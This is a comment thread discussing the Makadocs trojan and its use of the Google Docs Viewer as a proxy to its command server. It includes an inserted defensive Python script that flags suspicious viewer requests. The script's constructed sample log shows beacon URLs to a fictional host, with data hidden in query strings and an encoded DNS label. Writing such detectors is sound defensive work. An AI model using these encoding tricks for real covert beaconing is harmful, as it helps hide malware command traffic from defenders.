New Malware Variant Uses Google Docs As a Proxy To Phone Home
An anonymous reader writes "Windows 8 may block most malware out of the box, but there is still malware out there that thwarts Microsoft's latest and greatest. A new Trojan variant, detected as Backdoor.Makadocs and spread via RTF and Microsoft Word documents marked as Trojan.Dropper, has been discovered that not only adds a clause to target Windows 8 and Windows Server 2012, but also uses Google Docs as a proxy server to phone home to its Command & Control (C&C) server."
Google and Microsoft targeted... (Score:2, Funny)
must be an apple patent somewhere
Re: (Score:3)
Is it really a Google problem though? If it were I'd expect it to work on any OS.
Yes. The document goes on Google Docs and then, when it's accessed, the Google viewer sees the embedded link and sends a request to the C&C server. It sounds like it's more a Google exploit than an MS exploit.
Re: (Score:2)
The already exploited box is the one putting information on google docs. It is used as a communication medium, like IRC or a p2p protocol.
Re: (Score:2)
The already exploited box is the one putting information on google docs. It is used as a communication medium, like IRC or a p2p protocol.
That isn't clear in the article.
If you understand how this works, it would be helpful if you explained the mechanics.
Re: (Score:1, Insightful)
A google problem? Having a public server? Yeah whatever you shill.
I know it's trendy and hipster to hate on Google, but... NOBODY MAKES YOU USE ANY OF THEIR PRODUCTS OR SERVICES, which are free and quite open for stuff put out by a business. How dare they offer stuff people want in a non-annoying way for free!
Unlike ohhhhhhhh... just about any other company out there.
And since when has ANYTHING made by microsoft been bulletproof? Or even doesn't leak like a screen door... never.
Re: (Score:2)
No, it uses Google to get around your (possibly existing) firewall. If you open the document from the Google server, the Google server sends a message to the C&C server.
If you opened the google doc, nothing would happen. It is a communication medium between command & control and the infected machines.
Re: (Score:1)
Funny, Anonymous Coward is having a conversation with himself!
Re: (Score:2)
Hmm.. if I read the article correctly, Google Docs is used to get around firewalls and communicate with C&C servers. Which is a violation of Google's terms of service. But I'll assume for the moment valid user credentials are (ab)used to access Google Docs.
But spreading via RTF and Word documents? That means this trojan only takes control through a vulnerability (or multiple ones?) in RTF and Word document handling. That would definitely be a Windows 8 problem.
Article itself is short on details unf
Re: (Score:3)
Also puts Google in a very wonderful spot because they can correct the problem by taking down said documents, and redirecting people to getting their PCs fixed.
Re: (Score:2)
Also puts Google in a very wonderful spot because they can correct the problem by taking down said documents, and redirecting people to getting their PCs fixed.
Which in turn is not only good citizenship but also great marketing.
Re: (Score:2)
But Google could stop any and all communication with the C&C server, even without checking for the presence of the Trojan.
Re: (Score:2)
They don't have to look through your docs. They just look at the place the malware is phoning home to.
Re:Yep. (Score:4, Interesting)
But spreading via RTF and Word documents? That means this trojan only takes control through a vulnerability (or multiple ones?) in RTF and Word document handling. That would definitely be a Windows 8 problem.
No, it's definitely not a Windows 8 problem. It's clearly a problem with the software reading RTF and Word documents. Last I checked, user accounts on all OSes, including Windows, Linux, OS X, and BSD, could open up a socket and start hitting the network with whatever rights the user has.
The only place where it is acceptable to not allow networking by default is the land of mobile devices, and only some of them are actually like that.
Re:Yep. (Score:5, Interesting)
Even when Microsoft makes something bulletproof, these tech assholes have to blame a Google problem on Microsoft.
No.
It uses a vulnerability in RTF and Word documents to get into the system.
It only uses Google Docs as a fancy way to phone home.
Microsoft makes body armor now? Are they just small inserts like most motor sports body armor, or does it cover more of you? Is it Kevlar, ceramic, carbon fiber, or what? Maybe some of that memory foam that gets stronger than steel upon compression? I may be interested in some, if it's priced lower than Microsoft's stupid operating systems.
Servers (Score:2)
(looking at picture in article) I really have to wonder why malware authors use command and control servers covered in rust...
Re: (Score:2)
(looking at picture in article) I really have to wonder why malware authors use command and control servers covered in rust...
I'm sure it's goats blood, or human blood, or whatever they use for their search engine magic...
Re: (Score:3)
I'm sure it's goats blood, or human blood, or whatever they use for their search engine magic...
This is Symantec we're talking about. Their entire business model is "Hey, that's a nice computer you got there. It'd be a real shame if something were to... happen... to it." And we all know the murderous rage that powers McAfee. So it's probably not animal blood...
Re: (Score:2)
And we all know the murderous rage that powers McAfee.
With a side order of illicit drugs. Tasty, tasty roofies... (although given that the article I read said he was experimenting with rectal ingestion, not necessarily tasty...)
Account suspension (Score:1)
So, what happens when google suspends the account?
Re: (Score:1)
what happens when google suspends the account?
Re: (Score:2)
Some p2p request for a new list of accounts?
Re:Account suspension (Score:5, Informative)
The malware is not using Google Accounts at all. It is using Google Docs, literally, as a web proxy server. It is using the Google Docs Viewer (the one that can help view online PDFs and Docs in read-only mode, without downloading them to your local system) to pass information to the C&C server. The only way Google can prevent this is by using a captcha for suspicious requests.
Re: (Score:1)
Perhaps it passes information by GET request through the Google 'quick view' link.
Re: (Score:2)
Yeah, the quick view uses Google Docs Viewer. And yeah, the information has to be encoded in the URL. One way, as you said, is to use parameters. Another way is to encode it in the folder path or PDF file name itself. Another way is to encode it in the subdomain names, and wait for the request to hit your DNS server.
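The two comments above describe the mechanism from the defender's side: the infected host only ever talks to docs.google.com, Google's viewer makes the real request, and the beacon has to be squeezed into the URL the viewer is asked to fetch (query parameters, path or file name, or an encoded subdomain label that leaks out via DNS). The script below is an added example, not code from the article, Symantec, or the malware, showing how a proxy-log check for that pattern can work. It assumes the viewer takes the document to render as the `url` query parameter of https://docs.google.com/viewer, and it assumes a log format of `<client> <method> <url>`; the log lines are constructed, the host `c2.example` is fictional, and the heuristics (target carries parameters, target is not a document, leftmost DNS label decodes to printable text) are illustrative rather than a signature for any real sample.

```python
"""Spot Google Docs Viewer requests whose target URL looks like a C&C beacon.

Added example, not code from the article, Symantec, or the malware.
Assumptions: the viewer takes the document to fetch as the `url` query
parameter of https://docs.google.com/viewer, and the proxy log is
"<client> <method> <url>" (adjust both to your environment).
"""
import base64
import binascii
from urllib.parse import parse_qs, urlparse

VIEWER_HOST = "docs.google.com"
VIEWER_PATH = "/viewer"
DOC_SUFFIXES = (".pdf", ".doc", ".docx", ".rtf", ".ppt", ".pptx", ".xls", ".xlsx")

# Constructed sample proxy log (not real traffic; c2.example is fictional).
# Line 1 is an ordinary viewer request. Line 2 hides data in the target's
# query string (base64 "ABC123" and "1"). Line 3 hides it in a hex-encoded
# leftmost DNS label, which leaks via the resolver even if the HTTP fetch fails.
SAMPLE_LOG = """\
10.0.0.5 GET https://docs.google.com/viewer?url=https%3A%2F%2Fexample.org%2Freport.pdf
10.0.0.7 GET https://docs.google.com/viewer?url=http%3A%2F%2Fc2.example%2Fbeacon%3Fid%3DQUJDMTIz%26st%3DMQ
10.0.0.7 GET https://docs.google.com/viewer?url=http%3A%2F%2F6162633132332d77696e382d737461747573.c2.example%2Fx.pdf
10.0.0.9 GET https://www.google.com/search?q=rtf
"""


def viewer_target(url):
    """Return the URL the viewer was asked to fetch, or None for a non-viewer request."""
    p = urlparse(url)
    if p.hostname != VIEWER_HOST or p.path != VIEWER_PATH:
        return None
    targets = parse_qs(p.query).get("url")  # parse_qs percent-decodes the value
    return targets[0] if targets else None


def decode_label(label):
    """Try hex and base32 on a DNS label; return the text if it is printable ASCII."""
    if len(label) < 16:  # short labels are too ambiguous to judge
        return None
    candidates = []
    try:
        candidates.append(bytes.fromhex(label))
    except ValueError:
        pass
    try:
        padded = label.upper() + "=" * (-len(label) % 8)
        candidates.append(base64.b32decode(padded))
    except (binascii.Error, ValueError):
        pass
    for raw in candidates:
        if raw and all(32 <= b < 127 for b in raw):
            return raw.decode("ascii")
    return None


def suspicious_reasons(target):
    """Heuristics for a viewer target that is really a beacon; [] means nothing tripped."""
    t = urlparse(target)
    reasons = []
    if t.query:
        reasons.append("target URL carries parameters: " + t.query)
    if not t.path.lower().endswith(DOC_SUFFIXES):
        reasons.append("target path is not a document: " + (t.path or "/"))
    leftmost = (t.hostname or "").split(".")[0]
    decoded = decode_label(leftmost)
    if decoded is not None:
        reasons.append("leftmost DNS label decodes to: " + decoded)
    return reasons


def scan_log(text):
    """Return (client, target, reasons) for every viewer request that trips a heuristic."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        client, _method, url = parts
        target = viewer_target(url)
        if target is None:
            continue
        reasons = suspicious_reasons(target)
        if reasons:
            hits.append((client, target, reasons))
    return hits


if __name__ == "__main__":
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(client, target)
        for reason in reasons:
            print("   ", reason)
```

Run against the constructed log, the benign request from 10.0.0.5 passes and both requests from 10.0.0.7 are reported: the first for carrying parameters and pointing at a non-document path, the second because its leftmost label decodes to `abc123-win8-status`. The point of the third line is the one the comment makes about DNS: the label reaches the attacker's authoritative server as a query even if Google never completes the HTTP fetch, so a resolver log is worth checking alongside the proxy log.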
Brilliant (Score:4, Funny)
Because of all the downtime on Google docs, the communication with the C&C server is intermittent and therefore difficult to pinpoint by law enforcement. Security by instability.
Re: (Score:1)
Just my personal experience here, but I have never been unable to access my Google Docs - YMMV.
Now ask me about Amazon and we can have a very long and interesting conversation...
Re: (Score:2)
Just my personal experience here, but I have never been unable to access my Google Docs - YMMV.
Ask your mom to unblock the service on your router.
Re:Brilliant (Score:4, Interesting)
Because of all the downtime on Google docs, the communication with the C&C server is intermittent and therefore difficult to pinpoint by law enforcement. Security by instability.
FYI, if you'd like to know how often Google docs (or any other Google Apps service) is unavailable, Google provides an on-line status dashboard [google.com] with both current and historical information going back two months.
Googling for overall uptime stats shows that in 2010, Apps achieved 99.984% uptime and in 2011 99.9949% uptime, even after changing the methodology to count all downtimes, not just those lasting more than 10 minutes.
Re:spread via RTF?! (Score:4, Insightful)
Dude, Microsoft gives system access to anything that asks for it. Sometimes, it pauses to ask the guy at the keyboard if he WANTS to give system access to 'allyourfilebelongtous.exe', but the boob at the board invariably clicks "yes".
Re:spread via RTF?! (Score:5, Insightful)
I would LOVE to meet the idiots that decided that document formats (such as Word, Excel, PDF, RTF etc) need to support full programming languages with system level access.
Old office formats (Word Perfect, Lotus etc) got by just fine without programmability so why do modern formats need it?
A special place in hell should be reserved for the person who decided to merge 2 of the least secure mainstream programs known to man and add support for embedding a Flash file into a PDF file.
Re: (Score:2)
Horses used to canter just fine without internal combustion, why do we need it?
Re: (Score:2, Insightful)
Jonwil does have a point. It would have been useful if users were presented with a simple model of programs that process data. Documents would be inherently safe; programs would be something potentially harmful. By embedding programs in documents the distinction is blurred. If the same combination were presented and treated as a program containing a document, the situation would be clearer. A plain document would be associated with a launcher that loads the (let's say) word processing application but no
Re: (Score:2)
Horses used to canter just fine without internal combustion, why do we need it?
Strangely, though, even American auto consumers never quite cottoned on to the idea of hydrogen bomb powered engines.
Re: (Score:2)
It has nothing to do with progress. RTF, PDF and DOC are mostly used to display formatted text with images or other media, so why would anybody need any scripts there? We could easily abolish all those formats in favor of HTML + CSS + media files in a folder or compressed container; as an added bonus we would not need Google quick view then.
Re: (Score:1)
The RTF format doesn't support macros or any sort of scripting. Some RTF parsers are still vulnerable to buffer overflow attacks due to bugs in that particular software, so even with no embedded scripting in the RTF format arbitrary code can be executed as the parsing process.
As far as the need, I think macros in office products are justified. It's probably less useful in a document, but there are some very useful purposes for a macro in a spreadsheet. The key is, those macros need to be controlled to work
Sounds just like IRC (Score:5, Informative)
Sounds just like all the other malware which used to connect to IRC to take its orders. Only difference is the protocol now.
Bankaccount.Putmoney (Score:1)
> A new Trojan variant, detected as Backdoor.Makadocs and
> spread via RTF and Microsoft Word document marked as Trojan.Dropper
Ahhh, hackers are following good coding conventions about meaningful names (Object) dot (Verb). This is reassuring.
Re: (Score:2)
I had no idea what RTF is until I used Yahoo search. RTF stands for Rich Text Format that has been in use since around 1989. Do people still use RTF? Just asking because no one I know uses it. My friends and family use .doc and open office text .odt.
Yes, I am showing my age. lol
I wonder if Backdoor.Makadocs runs on older versions of Windows like Windows 7.
Lots of people use it. Using it avoids making any assumptions about what kind of word processing software is on your reader's system. Trust me, you've read plenty of RTFs and they're all over your system.
Innovative fix from google: (Score:2)
Update at 4:30PM EST: “Using any Google product to conduct this kind of activity is a violation of our product policies,” a Google spokesperson said in a statement.
In a related development, Microsoft fixed all its vulnerabilities by issuing a very simple patch. It is basically a statement issued by its spokesperson: "Using the vulnerabilities in Microsoft software is a violation of our product policies".
Yale lock company and the Chubb safe companies too issued a joint statement saying, "picking our locks is a violation of our product policies".
Creative infection (Score:1)
I have to admit I am impressed. Using Google Docs as an infection vector is ingenious. Why would anyone want to work out of "the cloud."